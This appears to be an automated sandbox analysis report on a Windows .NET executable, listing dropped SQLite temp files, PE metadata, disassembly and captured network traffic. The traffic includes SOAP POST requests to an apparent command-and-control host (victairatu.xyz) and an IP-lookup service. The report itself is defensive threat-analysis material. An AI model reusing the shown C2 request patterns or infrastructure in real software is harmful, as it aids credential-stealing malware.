                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpDAD3.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpDAD4.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpDB04.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\tmpDB05.tmp
                                                                        Process:C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.792852251086831
                                                                        Encrypted:false
                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                        Malicious:false
                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.2958132242584455
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:7d9bXpW0im.exe
                                                                        File size:273408
                                                                        MD5:0f838cf9ac70e706ab24f4555618186c
                                                                        SHA1:01ab9926ff27f0d253d63fe34c743bbbab05ee8f
                                                                        SHA256:b1445b8206b5f2f15cd8d9a7bb8e0b551491ed72cb07ccb5f2a1f877b084396c
                                                                        SHA512:f5d8695d327a9e0221e42fb7041c3d325294d2aa1e13c086fe2137a5bd76a3cf8545191bfa60e13e8cc72d1d24d7236a80504ab48f5bff48de20752cc89348d4
                                                                        SSDEEP:6144:vp4qqCFPFGPwRI8g1LjsP/N3S/KT1/i+CKYun2f:sCyYtUL7s/W
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................n................... ....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:f6cc829adea656d6

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x44a00a
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows cui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x6103CB83 [Fri Jul 30 09:50:59 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [0044A000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e7380x53.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x10e50.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x4a0000x8
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x2e0000x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        vMF<;0x20000x2a6c40x2a800False1.0003504136data7.99898892703IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .text0x2e0000x6a700x6c00False0.560040509259data6.09281772311IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x360000x10e500x11000False0.159380744485data3.8826680912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x480000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        0x4a0000x100x200False0.044921875data0.142635768149IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x361bc0x10828dBase III DBT, version number 0, next free block index 40
                                                                        RT_GROUP_ICON0x469e40x14data
                                                                        RT_VERSION0x469f80x26cdata
                                                                        RT_MANIFEST0x46c640x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        LegalCopyrightVentails
                                                                        Assembly Version1.0.0.0
                                                                        InternalNameVentails.exe
                                                                        FileVersion1.0.0.0
                                                                        ProductVersion1.0.0.0
                                                                        FileDescriptionVentails
                                                                        OriginalFilenameVentails.exe
                                                                        Translation0x0000 0x04b0

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 3, 2021 22:48:14.178733110 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:14.223237991 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:14.223365068 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:14.348303080 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:14.392484903 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:14.392528057 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:14.393225908 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:14.476562023 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:14.509370089 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:14.557112932 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:20.391555071 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:20.436714888 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:20.436759949 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:20.437163115 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:20.520802021 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:20.586513996 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:20.635776997 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.001121998 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.045519114 CEST8049731141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.045902014 CEST4973180192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.328779936 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.372627020 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.374176025 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.374692917 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.418334007 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.418421984 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.418843985 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.462780952 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.462804079 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.462814093 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.462826014 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.462841034 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.462853909 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.615509033 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.615992069 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.659739971 CEST8049737141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.659895897 CEST4973780192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.871145010 CEST4973880192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.915239096 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.915426970 CEST4973880192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.915970087 CEST4973880192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:30.962627888 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.962687969 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:30.963110924 CEST4973880192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:31.007253885 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:31.007340908 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:31.007380009 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:31.007661104 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:31.137005091 CEST8049738141.136.0.194192.168.2.3
                                                                        Aug 3, 2021 22:48:31.183881998 CEST4973880192.168.2.3141.136.0.194
                                                                        Aug 3, 2021 22:48:31.362185955 CEST4973880192.168.2.3141.136.0.194

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Aug 3, 2021 22:47:58.021667957 CEST6511053192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:47:58.046302080 CEST53651108.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:47:58.639971018 CEST5836153192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:47:58.664680958 CEST53583618.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:01.459038019 CEST6349253192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:01.492933035 CEST53634928.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:03.582242012 CEST6083153192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:03.607578993 CEST53608318.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:04.188258886 CEST6010053192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:04.221076012 CEST53601008.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:04.873971939 CEST5319553192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:04.906912088 CEST53531958.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:05.658739090 CEST5014153192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:05.693974018 CEST53501418.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:06.367454052 CEST5302353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:06.395109892 CEST53530238.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:07.167603970 CEST4956353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:07.202857971 CEST53495638.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:07.919429064 CEST5135253192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:07.948065996 CEST53513528.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:08.715379000 CEST5934953192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:08.741586924 CEST53593498.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:09.516592026 CEST5708453192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:09.549537897 CEST53570848.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:10.270088911 CEST5882353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:10.297621965 CEST53588238.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:11.169801950 CEST5756853192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:11.198421955 CEST53575688.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:11.878253937 CEST5054053192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:11.906200886 CEST53505408.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:13.734864950 CEST5436653192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:13.767337084 CEST53543668.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:14.098021984 CEST5303453192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:14.133831024 CEST53530348.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:14.560441971 CEST5776253192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:14.591310024 CEST53577628.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:22.104491949 CEST5543553192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:22.143460989 CEST53554358.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:22.152965069 CEST5071353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:22.186495066 CEST53507138.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:29.494749069 CEST5613253192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:29.529900074 CEST53561328.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:30.295046091 CEST5898753192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:30.327512026 CEST53589878.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:30.825989962 CEST5657953192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:30.868684053 CEST53565798.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:34.822927952 CEST6063353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:34.857409000 CEST53606338.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:45.508050919 CEST6129253192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:45.548691034 CEST53612928.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:54.070183039 CEST6361953192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:54.105849981 CEST53636198.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:55.655591965 CEST6493853192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:55.688657999 CEST53649388.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:48:57.799205065 CEST6194653192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:48:57.835216999 CEST53619468.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:49:31.733170986 CEST6491053192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:49:31.766381979 CEST53649108.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:49:32.065247059 CEST5212353192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:49:32.113439083 CEST53521238.8.8.8192.168.2.3
                                                                        Aug 3, 2021 22:49:55.199541092 CEST5613053192.168.2.38.8.8.8
                                                                        Aug 3, 2021 22:49:55.249603033 CEST53561308.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Aug 3, 2021 22:48:14.098021984 CEST192.168.2.38.8.8.80x8162Standard query (0)victairatu.xyzA (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:22.104491949 CEST192.168.2.38.8.8.80x5327Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:22.152965069 CEST192.168.2.38.8.8.80x12f8Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:30.295046091 CEST192.168.2.38.8.8.80xcf7eStandard query (0)victairatu.xyzA (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:30.825989962 CEST192.168.2.38.8.8.80x2f1dStandard query (0)victairatu.xyzA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Aug 3, 2021 22:48:14.133831024 CEST8.8.8.8192.168.2.30x8162No error (0)victairatu.xyz141.136.0.194A (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:22.143460989 CEST8.8.8.8192.168.2.30x5327No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                        Aug 3, 2021 22:48:22.186495066 CEST8.8.8.8192.168.2.30x12f8No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                        Aug 3, 2021 22:48:30.327512026 CEST8.8.8.8192.168.2.30xcf7eNo error (0)victairatu.xyz141.136.0.194A (IP address)IN (0x0001)
                                                                        Aug 3, 2021 22:48:30.868684053 CEST8.8.8.8192.168.2.30x2f1dNo error (0)victairatu.xyz141.136.0.194A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • victairatu.xyz

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349731141.136.0.19480C:\Users\user\Desktop\7d9bXpW0im.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Aug 3, 2021 22:48:14.348303080 CEST1157OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                        Host: victairatu.xyz
                                                                        Content-Length: 137
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: Keep-Alive
                                                                        Aug 3, 2021 22:48:14.392528057 CEST1157INHTTP/1.1 100 Continue
                                                                        Aug 3, 2021 22:48:14.509370089 CEST1159INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 03 Aug 2021 20:48:14 GMT
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Keep-Alive: timeout=3
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 38 63 0d 0a 1f 8b 08 00 00 00 00 00 02 03 6d 8f 41 0e c2 30 0c 04 bf 82 f2 80 fa 1e 85 1c a8 f8 00 3f a8 82 45 10 89 6d c5 0e 82 df 53 aa 02 87 72 b3 66 b5 b3 72 50 7f a4 3b 16 16 dc 3d 6a 21 f5 ba 77 d9 4c 3c 80 a6 8c 75 d2 61 e6 ca 93 0c dc 2e f0 3e 00 d7 06 b8 18 d4 1f f8 fc 8c 61 cc 98 6e 23 13 61 b2 13 aa 30 e9 6a fc fa 0c ab f4 76 5d 3c 6e d3 e8 c5 a2 b5 8e 01 fe 04 1b b8 f8 67 fc 99 87 df 1f f1 05 c6 a0 bb bd d4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 8cmA0?EmSrfrP;=j!wL<ua.>an#a0jv]<ng0
                                                                        Aug 3, 2021 22:48:20.391555071 CEST1173OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                        Host: victairatu.xyz
                                                                        Content-Length: 144
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Aug 3, 2021 22:48:20.436759949 CEST1173INHTTP/1.1 100 Continue
                                                                        Aug 3, 2021 22:48:20.586513996 CEST1174INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 03 Aug 2021 20:48:20 GMT
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Keep-Alive: timeout=3
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
